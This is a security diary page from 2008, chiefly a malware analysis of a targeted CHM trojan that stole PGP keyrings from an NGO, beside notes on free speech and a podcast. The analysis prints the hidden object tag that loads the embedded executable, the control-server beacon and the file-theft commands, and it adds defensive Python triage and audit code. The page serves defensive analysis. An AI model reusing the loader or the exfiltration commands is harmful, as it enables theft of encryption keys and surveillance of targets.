Freedom of Speech...or not?

Published: 2008-03-27
Last Updated: 2008-03-27 22:33:38 UTC
by Pedro Bueno (Version: 1)
4 comment(s)

When you are in your own country, you know your limits about what to say or not. This is valid for conferences, interviews, etc...

The thing is, when you go to a foreign country, you may not know what freedom of speech is like there, so it may become quite dangerous if you want to say something about the country that is hosting the event.

I am going to be giving a talk in Hong Kong on a hacking/security topic in the near future. I need to know what would happen if I say that China is a source of a lot of the problems that I see...

Would I be in jail right after the talk? Would I be prosecuted?

I know that Hong Kong has different laws than China itself, but it is definitely a good question, especially for me...;)

Also, if you know of a country where I would also find these kinds of problems, please let me know.

-------------------------------------------------------------------------------

Pedro Bueno ( pbueno //&&// isc. sans. org. )


Keywords: china

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:58 UTC
by Maarten Van Horenbeeck (Version: 1)
2 comment(s)

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in an e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero: on Virustotal.com, only two solutions actually flagged it as malicious.

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

<object width="0" height="0" style="display:none;"
type="application/x-oleobject" codebase="music.exe">

The goal of this code is to load a hidden object from the CHM container. This embedded file was also not recognized by the vast majority of anti-virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not to be a web server at all: any query other than the above was answered with an immediate disconnect. In response to the above request, the server replied with a large BASE64-encoded response, which turned out to be an additional executable file. The trojan then executed this file, its second-stage payload.

This file subsequently connected to a second server, which was the actual control server. It sent a registration URI identical to the one above to this machine. In return, the server responded with another BASE64-encoded string. This one was much shorter, and once decoded, turned out to be:

      <Command Begin>
      netmgetr usb:\*.doc
      netmgetr usb:\*.pkr
      netmgetr usb:\*.skr
      netlsr usb:\*.*
      <Command End>

Upon further review of the trojan code, netmgetr scans the file system for files matching the given name pattern and then copies them off the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but that was more proof-of-concept code.
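As an added example (not the diary's own code, and not the malware's), here is a small Python triage helper for the two-step exchange described above: it recognises the registration beacon, decodes a BASE64 response body and classifies it as either a PE second stage (MZ header) or a command block, and then lists which commands target keyring files. The request line and both response bodies are constructed samples modelled on the diary's text; the beacon regex, the accepted UID alphabet and the keyring extension set are assumptions.

```python
import base64
import os
import re

# Registration beacon described in the diary: GET /scripts/msadce.exe/?UID=<id>
# (tolerance for HTTP version and the UID alphabet are assumptions)
BEACON_RE = re.compile(r"^GET /scripts/msadce\.exe/\?UID=([A-Za-z0-9]+) HTTP/1\.[01]$")

# File extensions from the command block: PGP public (.pkr) and secret (.skr) keyrings
KEYRING_EXTS = {".pkr", ".skr"}


def parse_beacon(request_line):
    """Return the UID if the request line is the registration beacon, else None."""
    m = BEACON_RE.match(request_line.strip())
    return m.group(1) if m else None


def classify_response(body_b64):
    """Decode a BASE64 response body and classify it.

    Returns one of:
      ("executable", raw)      PE image (MZ header): the second-stage download
      ("commands", [..])       a <Command Begin>...<Command End> block, split into lines
      ("unknown", raw)         decoded fine but matches neither
      ("invalid-base64", None) not valid BASE64 at all
    """
    try:
        raw = base64.b64decode(body_b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return ("invalid-base64", None)
    if raw[:2] == b"MZ":
        return ("executable", raw)
    text = raw.decode("latin-1")  # never fails; the command block is ASCII anyway
    m = re.search(r"<Command Begin>(.*?)<Command End>", text, re.S)
    if m:
        cmds = [ln.strip() for ln in m.group(1).splitlines() if ln.strip()]
        return ("commands", cmds)
    return ("unknown", raw)


def commands_targeting_keyrings(cmds):
    """From commands like 'netmgetr usb:\\*.skr' return the (verb, pattern) pairs
    whose file pattern ends in a keyring extension."""
    hits = []
    for cmd in cmds:
        parts = cmd.split(None, 1)
        if len(parts) != 2:
            continue
        verb, pattern = parts
        if os.path.splitext(pattern)[1].lower() in KEYRING_EXTS:
            hits.append((verb, pattern))
    return hits


def triage(request_line, body_b64):
    """Combine the checks into a record an analyst could log or alert on."""
    kind, payload = classify_response(body_b64)
    report = {"beacon_uid": parse_beacon(request_line),
              "response_kind": kind,
              "keyring_targets": []}
    if kind == "commands":
        report["keyring_targets"] = commands_targeting_keyrings(payload)
    return report


# Constructed samples modelled on the diary (not real captures):
SAMPLE_REQUEST = "GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0"
SAMPLE_STAGE1 = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()  # fake PE stub
SAMPLE_STAGE2 = base64.b64encode(
    b"<Command Begin>\r\n"
    b"netmgetr usb:\\*.doc\r\n"
    b"netmgetr usb:\\*.pkr\r\n"
    b"netmgetr usb:\\*.skr\r\n"
    b"netlsr usb:\\*.*\r\n"
    b"<Command End>").decode()

if __name__ == "__main__":
    print(triage(SAMPLE_REQUEST, SAMPLE_STAGE1))
    print(triage(SAMPLE_REQUEST, SAMPLE_STAGE2))
```

Run it on a proxy log's request line plus the captured response body; a "commands" result with non-empty keyring_targets is the signal that the operator is after key material rather than documents alone.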

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to “map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

There are two things we can learn from this:

  • It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";
  • When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.
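The second lesson asks for sufficient security on key storage. As an added example (not the diary's code), the Python audit below walks a directory tree and reports keyring files that any other account on a POSIX host could read, i.e. files with group/other permission bits set. The .pkr/.skr extensions come from the command block above; including GnuPG's own keyring file names, and treating any group/other bit as a finding, are assumptions. The demo() fixture is constructed in a temporary directory.

```python
import os
import stat
import tempfile

# Keyring names to look for: the PGP extensions named in the attacker's command
# block, plus GnuPG's own keyring file names (assumption: same policy applies).
KEYRING_EXTS = {".pkr", ".skr"}
KEYRING_FILES = {"secring.gpg", "pubring.gpg", "pubring.kbx"}


def is_keyring(name):
    """True if a file name looks like a PGP/GnuPG keyring."""
    return name in KEYRING_FILES or os.path.splitext(name)[1].lower() in KEYRING_EXTS


def audit_keyrings(root):
    """Walk `root` and return (path, reason) for each keyring file that some other
    account on this host could access: any group/other permission bit set.
    Symlinked directories are not followed; a symlinked file is judged by the
    link's own mode (lstat), which is deliberately conservative."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not is_keyring(name):
                continue
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode & 0o077:
                findings.append((path, "mode %s allows group/other access" % oct(mode)))
    return sorted(findings)


def demo():
    """Constructed fixture in a temp dir: a group/world-readable public keyring,
    a correctly locked secret keyring and an unrelated world-readable file.
    Returns the basenames the audit flags (expected: just the .pkr)."""
    root = tempfile.mkdtemp(prefix="keyring-audit-")
    for name, mode in (("pubring.pkr", 0o644), ("secring.skr", 0o600), ("notes.txt", 0o666)):
        path = os.path.join(root, name)
        with open(path, "wb"):
            pass
        os.chmod(path, mode)
    return [os.path.basename(p) for p, _ in audit_keyrings(root)]


if __name__ == "__main__":
    print(demo())
```

Point audit_keyrings at a home directory (or a mounted removable drive, which is where the attacker's commands looked) to find keyrings that have drifted away from owner-only permissions.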

Cheers,

Maarten Van Horenbeeck
maarten at daemon.be


Internet Storm Center Podcast

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:21 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)
Quick update: The last episode ("Episode 1") is not available as MP3. We had some issues with MP3s initially, but I think it's solved now. Enjoy.

Joel and I got together to record a podcast. We would like to make this a regular feature, and include the monthly threat update webcast. The idea is to create an episode every 2 weeks. One episode each month will be published on "reboot wednesday". Another episode would follow 2 weeks later.

At this point, I set up 4 "Episodes":

  • 2 old webcasts (the last two) unchanged.
  • 1 "presentation" with slides about getting started with IPv6
  • and the new "podcast"

At this point, this is a test to see how the different formats work and which format you prefer most. The last "episode" is what I think these podcasts will come out like in the future. We are very interested in feedback!

(and yes... we know Joel is a bit "soft"... it's hard to get me quiet... I had the microphone running with an attenuator and put it about 3 feet away from me)

Try to search for the podcast in iTunes if you use iTunes (it should be up there... but I haven't found it yet :-( )
iTunes direct URL: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=276609412 (iTunes hasn't indexed our podcast yet, so you have to use this direct link)
The direct URL for the podcast: http://isc.sans.org/podcast.xml

------
Johannes B. Ullrich Ph.D.
jullrich \a t/ sans.org

Keywords: podcast
